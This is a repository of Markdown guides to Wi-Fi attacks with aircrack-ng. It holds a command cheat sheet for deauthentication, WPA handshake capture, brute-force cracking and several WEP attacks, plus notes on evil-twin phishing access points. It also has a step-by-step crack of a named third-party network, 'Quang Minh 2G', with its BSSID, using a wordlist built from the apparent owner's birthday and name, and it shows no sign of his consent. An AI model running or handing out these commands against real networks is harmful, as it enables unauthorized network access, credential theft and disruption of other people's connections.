├── Monitor-mode.md ├── README.md ├── Evil-Twin.md ├── Setup-OS.md ├── Crack-wpa-example.md ├── Use-attacks.md ├── LICENSE └── All-tools.md /Monitor-mode.md: -------------------------------------------------------------------------------- 1 | # Monitor mode 2 | 3 | ## Check mode status 4 | 5 | ``` 6 | sudo iw dev 7 | or 8 | sudo iwconfig 9 | or 10 | sudo airmon-ng 11 | ``` 12 | 13 | ![image](https://user-images.githubusercontent.com/90561566/163700017-5f40f0f8-1b37-498e-8b0f-7f7fe3a75cdc.png) 14 | 15 | ## Enable monitor mode 16 | 17 | ### Method 1: Using ip link set 18 | 19 | ``` 20 | sudo ip link set down 21 | sudo iw set monitor control 22 | sudo ip link set up 23 | ``` 24 | 25 | Check again 26 | 27 | ![image](https://user-images.githubusercontent.com/90561566/163700066-5f59de42-3486-4baa-a9f2-8860bfdef11a.png) 28 | 29 | If you want get back to the Managed Mode 30 | 31 | ``` 32 | sudo ip link set down 33 | sudo iw set type managed 34 | sudo ip link set up 35 | service NetworkManager restart 36 | ``` 37 | 38 | ### Method 2: Using iwconfig 39 | 40 | ``` 41 | sudo ifconfig down 42 | sudo iwconfig mode monitor 43 | sudo ifconfig up 44 | ``` 45 | 46 | If you want get back to the Managed Mode 47 | 48 | ``` 49 | sudo ifconfig down 50 | sudo iwconfig mode managed 51 | sudo ifconfig up 52 | service NetworkManager restart 53 | ``` 54 | 55 | ### Method 3: Using airmon-ng 56 | 57 | ``` 58 | sudo airmon-ng check kill 59 | sudo airmon-ng start 60 | ``` 61 | 62 | ![image](https://user-images.githubusercontent.com/90561566/163700327-50af7b2f-188c-44e4-8c54-3afc132dc065.png) 63 | 64 | It will create wlan0mon 65 | 66 | ![image](https://user-images.githubusercontent.com/90561566/163700331-65ed4e79-cf88-4cbd-b8b2-1763a5f8c938.png) 67 | 68 | If you want get back to the Managed Mode 69 | 70 | ``` 71 | sudo airmon-ng stop 72 | service NetworkManager restart 73 | ``` 74 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Aircrack-ng handbook 2 | 3 | You can jump to other files if you already know 4 | 5 | - [Setup-OS.md](/Setup-OS.md) (view infomation, configuring your wifi card, sometimes it won't be easy) 6 | - [Monitor-mode.md](/Monitor-mode.md) (About monitor mode, how to turn on/off, check) 7 | - [All-tools.md](/All-tools.md) (I'm sure it will be a very useful document) 8 | - [Use-attacks.md](/Use-attacks.md) (All usage of attacks by aircrack-ng) 9 | - [Crack-wpa-example.md](/Crack-wpa-example.md) (Example how did I crack a wifi) 10 | - [Evil-Twin.md](/Evil-Twin.md) (Discuss techniques related to Evil Twin) 11 | 12 | ## See also 13 | 14 | > Install driver for chipset [rtl8188eus](https://github.com/lucthienphong1120/rtl8188eus) 15 | 16 | > Install driver for chipset [rtl8188fu](https://github.com/lucthienphong1120/rtl8188fu) 17 | 18 | > User Passwords Profiler Passlist Generator [Cupp](https://github.com/lucthienphong1120/cupp) 19 | 20 | > Generate a dictionary file containing words [Crunch](https://www.kali.org/tools/crunch) 21 | 22 | > Wifi deauthencation tools [xDeauth](https://github.com/lucthienphong1120/xDeauth) 23 | 24 | > Wireless network auditor [wifite](https://github.com/lucthienphong1120/wifite2) 25 | 26 | > Multi-use bash script to audit wireless networks [airgeddon](https://github.com/lucthienphong1120/airgeddon) 27 | 28 | > Networks reconnaissance and MITM attacks [bettercap](https://github.com/bettercap/bettercap) 29 | 30 | > The Rogue Access Point Framework [wifiphisher](https://github.com/lucthienphong1120/wifiphisher) 31 | 32 | > Create AP with password encryption and internet connection [wifi-hotspot](https://github.com/lucthienphong1120/wifi-hotspot) 33 | 34 | > Vietnamese wordlists - Most common vietnamese password collection [wordlists-vi](https://github.com/lucthienphong1120/wordlists-vi) 35 | -------------------------------------------------------------------------------- /Evil-Twin.md: -------------------------------------------------------------------------------- 1 | ## Evil Twin 2 | 3 | Evil Twin is a way of using a phishing-fake AP to wait for clients to log in, enter their passwords, and catch those packets. 4 | 5 | ### Pros: 6 | 7 | Quick and easy, no need to spend a long time cracking passwords. 8 | 9 | ### Cons: 10 | 11 | According to the tools I have used (such as Fluxion, Wifiphisher, and Airgeddon), I do not think they are as effective as I once thought. 12 | Specifically, everything is fine from creating a fake AP with the same SSID as the original one, to capturing the handshake packets and faking it to a fake WiFi. Then, I tested it by connecting to the fake WiFi with my phone, and I was able to enter my password without any issues. However, I waited for a long time, but I did not see any clients log in. Although these tools open a terminal and send deauth packets through MDK3 or Aireplay-ng to clients who are already connected to the original WiFi to force them to reconnect to the fake WiFi, I am still concluding that this method is not very efficient. 13 | 14 | ### Weakness 15 | After tools such as Fluxion, Wifiphishing, and Airgeddon send deauth packets to the original AP, clients who are in that original AP are kicked out, but they automatically reconnect to the original AP. The reason is that the signal generated by your fake network card is not strong enough to overpower the original AP, so the client's device automatically reconnects to the original AP. 16 | 17 | There are two issues here: distance and the strength of your network card (usually the laptop's network card or a USB WiFi adapter). 18 | 19 | Deauthentication or Bumping Him Off 20 | The next step is to bump the victim off the access point. The 802.11 standard has a special frame called a deauthentication frame, which, as you might expect, deauthenticates everyone on the access point. When his computer tries to authenticate again, it will automatically connect to the strongest AP with the ESSID of "Elroy." 21 | 22 | Note that once again, we have used his BSSID in the aireplay-ng command. If our signal is stronger than his AP, he will automatically connect to our evil twin! 23 | 24 | ### How to fix 25 | 26 | The prerequisites for this attack include: 27 | 28 | + Being near the targeted WiFi (about 80-90% signal strength). 29 | + Having a strong network card to create a fake network with a strong signal to overpower the original one. 30 | + Choosing the right USB WiFi adapter is also essential. 31 | 32 | -------------------------------------------------------------------------------- /Setup-OS.md: -------------------------------------------------------------------------------- 1 | # Setup usb wifi 2 | 3 | I use tp-link wn725n (chip set rtl8188eus) 4 | 5 | ### Is your wifi support monitor mode ? 6 | 7 | ``` 8 | iw dev 9 | iw phy phy0 info 10 | ``` 11 | 12 | Here will show all your wifi card parameters 13 | 14 | ![image](https://user-images.githubusercontent.com/90561566/163820140-91bfaa6a-0382-47f5-b075-8c07fc9a0778.png) 15 | 16 | ### Check connect: 17 | 18 | ``` 19 | iwconfig 20 | ``` 21 | 22 | ![image](https://user-images.githubusercontent.com/90561566/168417839-476e7b37-9889-4349-a04e-d1dfd8ada697.png) 23 | 24 | when it first connects, it's usually mode: auto, it's actually mode: manager 25 | 26 | ### See information: 27 | 28 | ``` 29 | lsusb 30 | lsusb -D /dev/bus/usb// 31 | ``` 32 | 33 | ![image](https://user-images.githubusercontent.com/90561566/168417917-4758a81d-1823-44e5-92fd-79b2212ec6a5.png) 34 | 35 | ### Setup OS: 36 | 37 | You can refer to the following links: 38 | 39 | - Command Install: https://github.com/davidbombal/Kali-Linux/blob/main/TP-Link%20TL-WN722N%20adapter 40 | - Install Driver: https://github.com/aircrack-ng/rtl8188eus 41 | - Tool Auto Install: https://github.com/lucthienphong1120/rtl8188eus 42 | 43 | ### Linux header: 44 | 45 | First, update the OS 46 | ``` 47 | sudo apt update 48 | sudo apt upgrade 49 | sudo apt-get dist-upgrade 50 | reboot 51 | ``` 52 | 53 | 1) Method 1: Run the following command to install the kernel header file. 54 | 55 | ``` 56 | sudo apt-get install linux-headers-$(uname -r) 57 | ``` 58 | 59 | After running this command, the system will automatically find the matched kernel header 60 | file to download and install it. If the Kali server is updated, you may not find the specific file, 61 | in this case, you can manually download and install the header file. 62 | 63 | 2) Method 2: Manually Download and Compile to Install 64 | 65 | Check the system version of Kali 66 | ``` 67 | uname -r 68 | ``` 69 | 70 | Example: 5.15.0-kali3-amd64 71 | 72 | ![image](https://user-images.githubusercontent.com/90561566/163698742-5110bbca-0f01-4fd1-a8bc-cd4787a1e30c.png) 73 | 74 | Go to one of the following link: 75 | - http://kali.download/kali/pool/main/l/linux/ 76 | - http://http.kali.org/kali/pool/main/l/linux/ 77 | 78 | Ctrl+F and find `linux-kbuild-` + `5.15` + `_5.15` + xxxxxx + `amd64.deb` (choose the appropriate version you need) 79 | 80 | ![image](https://user-images.githubusercontent.com/90561566/163698880-60c0bf39-723c-4aed-8584-6424997e7f61.png) 81 | 82 | xxxxxx here is `.15-1kali2_` 83 | 84 | Ctrl+F and find `linux-headers-` + `5.15.0-kali3-amd64` + `_5.15` + xxxxxx + `_amd64.deb` (choose the appropriate version you need) 85 | 86 | ![image](https://user-images.githubusercontent.com/90561566/163699304-4a5e0161-9274-4393-9f1e-4f95c6a50948.png) 87 | 88 | Maybe you will need `linux-compiler-gcc-11-x86` 89 | 90 | ![image](https://user-images.githubusercontent.com/90561566/163699463-8ed7cfe5-6bf4-4460-bcae-4a4556e1ba49.png) 91 | 92 | Go to download directory 93 | 94 | ``` 95 | sudo dpkg -i linux-kbuild...... 96 | sudo dpkg -i linux-compiler...... 97 | sudo dpkg -i linux-headers..... 98 | dpkg-query -s linux-headers-$(uname -r) 99 | ``` 100 | 101 | ![image](https://user-images.githubusercontent.com/90561566/163699497-19fe1c40-d6a9-4f27-9e87-3a5314ec9b5f.png) 102 | 103 | Check the `/lib/modules//` directory and you will see a build link file 104 | 105 | ![image](https://user-images.githubusercontent.com/90561566/163699535-d7d246b5-8c2b-4912-b7fd-d49052ee3ac8.png) 106 | 107 | ### Compile driver 108 | 109 | Go to the driver directory (rtl8188eus with me). Run the following commands to compile the driver. 110 | 111 | ``` 112 | make all 113 | make install 114 | ``` 115 | 116 | If success, you can will a name of the ``.ko file is stored in there. 117 | 118 | ### Load the Driver 119 | 120 | ``` 121 | sudo apt install bc 122 | sudo apt-get install build-essential 123 | sudo apt-get install libelf-dev 124 | sudo apt install dkms 125 | ``` 126 | 127 | ``` 128 | sudo rmmod r8188eu.ko 129 | git clone https://github.com/aircrack-ng/rtl8188eus 130 | cd rtl8188eus 131 | sudo -i 132 | echo 'blacklist r8188eu' | sudo tee -a '/etc/modprobe.d/realtek.conf' 133 | exit 134 | reboot 135 | ``` 136 | 137 | ``` 138 | cd rtl8188eus 139 | sudo make && make install 140 | reboot 141 | ``` 142 | -------------------------------------------------------------------------------- /Crack-wpa-example.md: -------------------------------------------------------------------------------- 1 | # Example crack wpa attack with aircrack-ng 2 | 3 | i use tp-link wn725n (chipset rtl8188eus) and parrotOS 4 | 5 | connect your card wifi and check 6 | 7 | ``` 8 | iwconfig 9 | ``` 10 | 11 | ![image](https://user-images.githubusercontent.com/90561566/168417974-d9650a49-951b-4a6f-ab8b-12e4f7cd7455.png) 12 | 13 | ``` 14 | airmon-ng check kill 15 | airmon-ng start 16 | ``` 17 | 18 | ![image](https://user-images.githubusercontent.com/90561566/168418068-964e3312-b269-44fc-9721-398be478f2ce.png) 19 | 20 | ``` 21 | airodump-ng 22 | ``` 23 | 24 | ![image](https://user-images.githubusercontent.com/90561566/168418114-4d4e8f16-58ec-4358-bc99-dd625f4e7d26.png) 25 | 26 | i will choose target is `Quang Minh 2G`, CH `11`, bssid `5C:1A:6F:88:19:19` to monitor close 27 | 28 | ``` 29 | airodump-ng -c --bssid -w out 30 | ``` 31 | 32 | ![image](https://user-images.githubusercontent.com/90561566/168418356-e901847a-143e-4509-85b2-efeb783b1ca1.png) 33 | 34 | new terminal 35 | 36 | ``` 37 | aireplay-ng --deauth 0 -a 38 | ``` 39 | 40 | ![image](https://user-images.githubusercontent.com/90561566/168418251-fe850fa5-0687-4241-836d-9d287f276e95.png) 41 | 42 | wait about 5s, return airodump-ng terminal, if you see WPA handshake is okay and Ctrl+C to stop (both) 43 | 44 | ![image](https://user-images.githubusercontent.com/90561566/166421288-8ba74de3-f6f9-4973-be3e-d9aafd8fcb11.png) 45 | 46 | ``` 47 | ls 48 | ``` 49 | 50 | ![image](https://user-images.githubusercontent.com/90561566/166421374-cfcf7080-c28a-402b-a6cb-9fda3a275a91.png) 51 | 52 | create passlist 53 | 54 | ``` 55 | crunch -t -o password.txt 56 | ``` 57 | 58 | because it's going to be a very, very large file, so i'm going to reveal that 59 | 60 | the password is 8 numbers (i think it contains in his birthday) and 1 character (i think it contains in his name) 61 | 62 | you can also use [Cupp](https://github.com/lucthienphong1120/cupp) to make such inferences 63 | 64 | ![image](https://user-images.githubusercontent.com/90561566/166604507-5c291bf0-6961-4a15-8c52-cf5faf0b749f.png) 65 | 66 | the output file about 11,5 GB and 1,2 billion passwords 67 | 68 | --- 69 | 70 | now you can crack wpa with 71 | 72 | ``` 73 | aircrack-ng -w password.txt out*.cap 74 | ``` 75 | 76 | or redirect directly from crunch 77 | 78 | ``` 79 | crunch -t | aircrack-ng -w- out*.cap 80 | ``` 81 | 82 | add `--bssid 5C:1A:6F:88:19:19` if there is some error cann't identify bssid 83 | 84 | ![image](https://user-images.githubusercontent.com/90561566/193400385-8a26d738-a8be-4f66-9735-f9ef506166b1.png) 85 | 86 | speed of cracking about 1kp/s at least depend on your hardware processor (normally about 2-3kp/s) 87 | 88 | ![image](https://user-images.githubusercontent.com/90561566/193245022-8c0a5de2-32c6-4b34-bb8d-30dc8ce51521.png) 89 | 90 | --- 91 | 92 | but i will use database to speed up the attack 93 | 94 | it will take more time to set up the database (but it will be much faster than regular crack) 95 | 96 | you should only use it if you create a permanent database for crack because it will take a long time (or the passlist is not too long) 97 | 98 | install sqlite3 `sudo apt install sqlite3` 99 | 100 | create a file `essid.txt` this write name of target wifi 101 | 102 | ![image](https://user-images.githubusercontent.com/90561566/166434891-81c08ca3-48ff-4579-9a74-fe6e65634b42.png) 103 | 104 | ``` 105 | airolib-ng crackwpa --import passwd password.txt 106 | airolib-ng crackwpa --import essid essid.txt 107 | ``` 108 | 109 | ![image](https://user-images.githubusercontent.com/90561566/166435872-44a73959-3784-41c3-849a-5c1aa823dcd4.png) 110 | 111 | ``` 112 | airolib-ng crackwpa --batch 113 | ``` 114 | 115 | ![image](https://user-images.githubusercontent.com/90561566/166454564-9b6cd253-74a0-4304-b94e-988a3e92f825.png) 116 | 117 | 118 | now crack with database, you will be surprised 119 | 120 | ``` 121 | aircrack-ng -r crackwpa out*.cap 122 | ``` 123 | 124 | done! there is the password (crack speed is about 36kp/s) 125 | 126 | ![image](https://user-images.githubusercontent.com/90561566/166684325-e337e6cd-f376-4172-91a2-617a80a3156c.png) 127 | 128 | ``` 129 | airmon-ng stop 130 | service NetworkManager restart 131 | ``` 132 | 133 | ![image](https://user-images.githubusercontent.com/90561566/168418601-6af69920-10bc-47ea-b5d7-7d5fc0ea3017.png) 134 | 135 | -------------------------------------------------------------------------------- /Use-attacks.md: -------------------------------------------------------------------------------- 1 | # All usage of attacks by aircrack-ng 2 | 3 | In this example 4 | - `wlan0` is the name of your interface in manager mode 5 | - `mon0` is the name of your interface in monitor mode 6 | - `teddy` is the name of your target network 7 | - `00:14:6C:7E:40:80` is the bssid of target network 8 | - `00:09:5B:EB:C5:2B` is the bssid of your network 9 | - `-c X` is the channel of target network 10 | - `out.cap` is the filename to capture the WPA handshake 11 | - `password.txt` is the filename to brute force 12 | - `password.txt` is the file contains name of target network 13 | - `crackwpa` is the database name for cracking password 14 | - `sharedkey.xor` is the name of file containing the PRGA xor bits 15 | 16 | ## Scan network around 17 | 18 | ``` 19 | airmon-ng check kill 20 | airmon-ng start wlan0 21 | airodump-ng mon0 22 | ``` 23 | 24 | ![image](https://user-images.githubusercontent.com/90561566/166110658-56663408-8ef9-4681-a5d1-4e7ec4bd3562.png) 25 | 26 | ## [Deauthentication](https://www.aircrack-ng.org/doku.php?id=deauthentication) 27 | 28 | You can try it: https://github.com/lucthienphong1120/xDeauth 29 | 30 | ``` 31 | aireplay-ng --deauth 0 -a 00:14:6C:7E:40:80 mon0 32 | or 33 | aireplay-ng -0 0 -a 00:14:6C:7E:40:80 mon0 34 | ``` 35 | 36 | Ctrl+C to stop deauth 37 | 38 | ## WPA/WPA2 Handshake capture 39 | 40 | ``` 41 | airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out mon0 42 | aireplay-ng --deauth 0 -a 00:14:6C:7E:40:80 mon0 43 | ls 44 | ``` 45 | 46 | ## [Cracking WPA/WPA2](https://www.aircrack-ng.org/doku.php?id=cracking_wpa) 47 | 48 | ``` 49 | airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out mon0 50 | aireplay-ng --deauth 0 -a 00:14:6C:7E:40:80 mon0 51 | (wait handshake) 52 | aircrack-ng -w password.txt out*.cap 53 | ``` 54 | 55 | ## [ARP Request Replay Attack](https://www.aircrack-ng.org/doku.php?id=arp-request_reinjection) 56 | 57 | ``` 58 | airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out mon0 59 | aireplay-ng -0 10 -a 00:14:6C:7E:40:80 mon0 60 | aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0 61 | ``` 62 | 63 | ## Crack WEP by ARP request reinjection 64 | 65 | ``` 66 | airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out mon0 67 | aireplay-ng -1 100 -a 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0 68 | aireplay-ng -3 0 -b 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0 69 | (wait to capture about 70.000 packet) 70 | aircrack-ng -a 1 out*.cap 71 | ``` 72 | 73 | ## Speed up cracking use database 74 | 75 | ``` 76 | sudo apt install sqlite3 77 | airolib-ng crackwpa --import passwd password.txt 78 | airolib-ng crackwpa --import essid essid.txt 79 | airolib-ng crackwpa --stats # to check information about your database before batch 80 | airolib-ng crackwpa --clean all # to clean the database from old junk and integrity check 81 | (you can skip 2 lines above) 82 | airolib-ng crackwpa --batch 83 | aircrack-ng -r crackwpa out*.cap 84 | ``` 85 | 86 | ## Passlist Generation tools 87 | 88 | Aircrack often uses brute force with some other tools as follows: 89 | 90 | - [Cupp](https://github.com/lucthienphong1120/cupp) 91 | - /usr/share/wordlists/rockyou.txt.gz 92 | - [Crunch](https://www.kali.org/tools/crunch) 93 | 94 | ``` 95 | crunch [min] [max] [charset] -t [pattern] -o [path file] 96 | ``` 97 | 98 | ## [Interactive packet replay](https://www.aircrack-ng.org/doku.php?id=interactive_packet_replay) 99 | 100 | Natural Packet Replay 101 | 102 | ``` 103 | aireplay-ng -2 -b 00:14:6C:7E:40:80 -d 00:09:5B:EB:C5:2B -t 1 mon0 104 | ``` 105 | 106 | Modified Packet Replay 107 | 108 | ``` 109 | aireplay-ng -2 -b 00:14:6C:7E:40:80 -t 1 -c 00:09:5B:EB:C5:2B -p 0841 mon0 110 | ``` 111 | 112 | Rebroadcast the packet and thereby generate new IVs 113 | 114 | ``` 115 | aireplay-ng -2 -p 0841 -c 00:09:5B:EB:C5:2B -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0 116 | ``` 117 | 118 | ## [Fake authentication](https://www.aircrack-ng.org/doku.php?id=fake_authentication) 119 | 120 | ``` 121 | aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0 122 | ``` 123 | 124 | Another variation 125 | 126 | ``` 127 | aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0 128 | ``` 129 | 130 | ## [Shared key fake authentication](https://www.aircrack-ng.org/doku.php?id=shared_key) 131 | 132 | Start interface monitor mode on AP channel 133 | 134 | ``` 135 | airmon-ng start wlan0 6 136 | airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w sharedkey mon0 137 | (wait AUTH=SKA) 138 | ls 139 | ``` 140 | 141 | Deauthenticate a connected client 142 | 143 | ``` 144 | aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 mon0 145 | ``` 146 | 147 | `00:0F:B5:34:30:30` is the MAC address of the client you are deauthing 148 | 149 | Perform Shared Key Fake Authentication 150 | 151 | ``` 152 | aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B -y sharedkey*.xor mon0 153 | ``` 154 | 155 | ## [Fragmentation Attack](https://www.aircrack-ng.org/doku.php?id=fragmentation) 156 | 157 | ``` 158 | aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0 159 | ``` 160 | 161 | ## [Crack WEP with KoreK chopchop](https://www.aircrack-ng.org/doku.php?id=korek_chopchop) 162 | 163 | ``` 164 | aireplay-ng -4 -b 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0 165 | ``` 166 | 167 | Chopchop Without Authentication 168 | 169 | ``` 170 | aireplay-ng -4 -b 00:14:6C:7E:40:80 mon0 171 | ``` 172 | 173 | ## [Crack WEP with Cafe Latte](https://www.aircrack-ng.org/doku.php?id=cafe-latte) 174 | 175 | ``` 176 | aireplay-ng -6 -b 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B -D mon0 177 | ``` 178 | 179 | ## [ARP amplification with packetforge-ng](https://www.aircrack-ng.org/doku.php?id=arp_amplification) 180 | 181 | Read more: https://www.aircrack-ng.org/doku.php?id=arp_amplification 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Mozilla Public License Version 2.0 2 | ================================== 3 | 4 | 1. Definitions 5 | -------------- 6 | 7 | 1.1. "Contributor" 8 | means each individual or legal entity that creates, contributes to 9 | the creation of, or owns Covered Software. 10 | 11 | 1.2. "Contributor Version" 12 | means the combination of the Contributions of others (if any) used 13 | by a Contributor and that particular Contributor's Contribution. 14 | 15 | 1.3. "Contribution" 16 | means Covered Software of a particular Contributor. 17 | 18 | 1.4. "Covered Software" 19 | means Source Code Form to which the initial Contributor has attached 20 | the notice in Exhibit A, the Executable Form of such Source Code 21 | Form, and Modifications of such Source Code Form, in each case 22 | including portions thereof. 23 | 24 | 1.5. "Incompatible With Secondary Licenses" 25 | means 26 | 27 | (a) that the initial Contributor has attached the notice described 28 | in Exhibit B to the Covered Software; or 29 | 30 | (b) that the Covered Software was made available under the terms of 31 | version 1.1 or earlier of the License, but not also under the 32 | terms of a Secondary License. 33 | 34 | 1.6. "Executable Form" 35 | means any form of the work other than Source Code Form. 36 | 37 | 1.7. "Larger Work" 38 | means a work that combines Covered Software with other material, in 39 | a separate file or files, that is not Covered Software. 40 | 41 | 1.8. "License" 42 | means this document. 43 | 44 | 1.9. "Licensable" 45 | means having the right to grant, to the maximum extent possible, 46 | whether at the time of the initial grant or subsequently, any and 47 | all of the rights conveyed by this License. 48 | 49 | 1.10. "Modifications" 50 | means any of the following: 51 | 52 | (a) any file in Source Code Form that results from an addition to, 53 | deletion from, or modification of the contents of Covered 54 | Software; or 55 | 56 | (b) any new file in Source Code Form that contains any Covered 57 | Software. 58 | 59 | 1.11. "Patent Claims" of a Contributor 60 | means any patent claim(s), including without limitation, method, 61 | process, and apparatus claims, in any patent Licensable by such 62 | Contributor that would be infringed, but for the grant of the 63 | License, by the making, using, selling, offering for sale, having 64 | made, import, or transfer of either its Contributions or its 65 | Contributor Version. 66 | 67 | 1.12. "Secondary License" 68 | means either the GNU General Public License, Version 2.0, the GNU 69 | Lesser General Public License, Version 2.1, the GNU Affero General 70 | Public License, Version 3.0, or any later versions of those 71 | licenses. 72 | 73 | 1.13. "Source Code Form" 74 | means the form of the work preferred for making modifications. 75 | 76 | 1.14. "You" (or "Your") 77 | means an individual or a legal entity exercising rights under this 78 | License. For legal entities, "You" includes any entity that 79 | controls, is controlled by, or is under common control with You. For 80 | purposes of this definition, "control" means (a) the power, direct 81 | or indirect, to cause the direction or management of such entity, 82 | whether by contract or otherwise, or (b) ownership of more than 83 | fifty percent (50%) of the outstanding shares or beneficial 84 | ownership of such entity. 85 | 86 | 2. License Grants and Conditions 87 | -------------------------------- 88 | 89 | 2.1. Grants 90 | 91 | Each Contributor hereby grants You a world-wide, royalty-free, 92 | non-exclusive license: 93 | 94 | (a) under intellectual property rights (other than patent or trademark) 95 | Licensable by such Contributor to use, reproduce, make available, 96 | modify, display, perform, distribute, and otherwise exploit its 97 | Contributions, either on an unmodified basis, with Modifications, or 98 | as part of a Larger Work; and 99 | 100 | (b) under Patent Claims of such Contributor to make, use, sell, offer 101 | for sale, have made, import, and otherwise transfer either its 102 | Contributions or its Contributor Version. 103 | 104 | 2.2. Effective Date 105 | 106 | The licenses granted in Section 2.1 with respect to any Contribution 107 | become effective for each Contribution on the date the Contributor first 108 | distributes such Contribution. 109 | 110 | 2.3. Limitations on Grant Scope 111 | 112 | The licenses granted in this Section 2 are the only rights granted under 113 | this License. No additional rights or licenses will be implied from the 114 | distribution or licensing of Covered Software under this License. 115 | Notwithstanding Section 2.1(b) above, no patent license is granted by a 116 | Contributor: 117 | 118 | (a) for any code that a Contributor has removed from Covered Software; 119 | or 120 | 121 | (b) for infringements caused by: (i) Your and any other third party's 122 | modifications of Covered Software, or (ii) the combination of its 123 | Contributions with other software (except as part of its Contributor 124 | Version); or 125 | 126 | (c) under Patent Claims infringed by Covered Software in the absence of 127 | its Contributions. 128 | 129 | This License does not grant any rights in the trademarks, service marks, 130 | or logos of any Contributor (except as may be necessary to comply with 131 | the notice requirements in Section 3.4). 132 | 133 | 2.4. Subsequent Licenses 134 | 135 | No Contributor makes additional grants as a result of Your choice to 136 | distribute the Covered Software under a subsequent version of this 137 | License (see Section 10.2) or under the terms of a Secondary License (if 138 | permitted under the terms of Section 3.3). 139 | 140 | 2.5. Representation 141 | 142 | Each Contributor represents that the Contributor believes its 143 | Contributions are its original creation(s) or it has sufficient rights 144 | to grant the rights to its Contributions conveyed by this License. 145 | 146 | 2.6. Fair Use 147 | 148 | This License is not intended to limit any rights You have under 149 | applicable copyright doctrines of fair use, fair dealing, or other 150 | equivalents. 151 | 152 | 2.7. Conditions 153 | 154 | Sections 3.1, 3.2, 3.3, and 3.4 are conditions of the licenses granted 155 | in Section 2.1. 156 | 157 | 3. Responsibilities 158 | ------------------- 159 | 160 | 3.1. Distribution of Source Form 161 | 162 | All distribution of Covered Software in Source Code Form, including any 163 | Modifications that You create or to which You contribute, must be under 164 | the terms of this License. You must inform recipients that the Source 165 | Code Form of the Covered Software is governed by the terms of this 166 | License, and how they can obtain a copy of this License. You may not 167 | attempt to alter or restrict the recipients' rights in the Source Code 168 | Form. 169 | 170 | 3.2. Distribution of Executable Form 171 | 172 | If You distribute Covered Software in Executable Form then: 173 | 174 | (a) such Covered Software must also be made available in Source Code 175 | Form, as described in Section 3.1, and You must inform recipients of 176 | the Executable Form how they can obtain a copy of such Source Code 177 | Form by reasonable means in a timely manner, at a charge no more 178 | than the cost of distribution to the recipient; and 179 | 180 | (b) You may distribute such Executable Form under the terms of this 181 | License, or sublicense it under different terms, provided that the 182 | license for the Executable Form does not attempt to limit or alter 183 | the recipients' rights in the Source Code Form under this License. 184 | 185 | 3.3. Distribution of a Larger Work 186 | 187 | You may create and distribute a Larger Work under terms of Your choice, 188 | provided that You also comply with the requirements of this License for 189 | the Covered Software. If the Larger Work is a combination of Covered 190 | Software with a work governed by one or more Secondary Licenses, and the 191 | Covered Software is not Incompatible With Secondary Licenses, this 192 | License permits You to additionally distribute such Covered Software 193 | under the terms of such Secondary License(s), so that the recipient of 194 | the Larger Work may, at their option, further distribute the Covered 195 | Software under the terms of either this License or such Secondary 196 | License(s). 197 | 198 | 3.4. Notices 199 | 200 | You may not remove or alter the substance of any license notices 201 | (including copyright notices, patent notices, disclaimers of warranty, 202 | or limitations of liability) contained within the Source Code Form of 203 | the Covered Software, except that You may alter any license notices to 204 | the extent required to remedy known factual inaccuracies. 205 | 206 | 3.5. Application of Additional Terms 207 | 208 | You may choose to offer, and to charge a fee for, warranty, support, 209 | indemnity or liability obligations to one or more recipients of Covered 210 | Software. However, You may do so only on Your own behalf, and not on 211 | behalf of any Contributor. You must make it absolutely clear that any 212 | such warranty, support, indemnity, or liability obligation is offered by 213 | You alone, and You hereby agree to indemnify every Contributor for any 214 | liability incurred by such Contributor as a result of warranty, support, 215 | indemnity or liability terms You offer. You may include additional 216 | disclaimers of warranty and limitations of liability specific to any 217 | jurisdiction. 218 | 219 | 4. Inability to Comply Due to Statute or Regulation 220 | --------------------------------------------------- 221 | 222 | If it is impossible for You to comply with any of the terms of this 223 | License with respect to some or all of the Covered Software due to 224 | statute, judicial order, or regulation then You must: (a) comply with 225 | the terms of this License to the maximum extent possible; and (b) 226 | describe the limitations and the code they affect. Such description must 227 | be placed in a text file included with all distributions of the Covered 228 | Software under this License. Except to the extent prohibited by statute 229 | or regulation, such description must be sufficiently detailed for a 230 | recipient of ordinary skill to be able to understand it. 231 | 232 | 5. Termination 233 | -------------- 234 | 235 | 5.1. The rights granted under this License will terminate automatically 236 | if You fail to comply with any of its terms. However, if You become 237 | compliant, then the rights granted under this License from a particular 238 | Contributor are reinstated (a) provisionally, unless and until such 239 | Contributor explicitly and finally terminates Your grants, and (b) on an 240 | ongoing basis, if such Contributor fails to notify You of the 241 | non-compliance by some reasonable means prior to 60 days after You have 242 | come back into compliance. Moreover, Your grants from a particular 243 | Contributor are reinstated on an ongoing basis if such Contributor 244 | notifies You of the non-compliance by some reasonable means, this is the 245 | first time You have received notice of non-compliance with this License 246 | from such Contributor, and You become compliant prior to 30 days after 247 | Your receipt of the notice. 248 | 249 | 5.2. If You initiate litigation against any entity by asserting a patent 250 | infringement claim (excluding declaratory judgment actions, 251 | counter-claims, and cross-claims) alleging that a Contributor Version 252 | directly or indirectly infringes any patent, then the rights granted to 253 | You by any and all Contributors for the Covered Software under Section 254 | 2.1 of this License shall terminate. 255 | 256 | 5.3. In the event of termination under Sections 5.1 or 5.2 above, all 257 | end user license agreements (excluding distributors and resellers) which 258 | have been validly granted by You or Your distributors under this License 259 | prior to termination shall survive termination. 260 | 261 | ************************************************************************ 262 | * * 263 | * 6. Disclaimer of Warranty * 264 | * 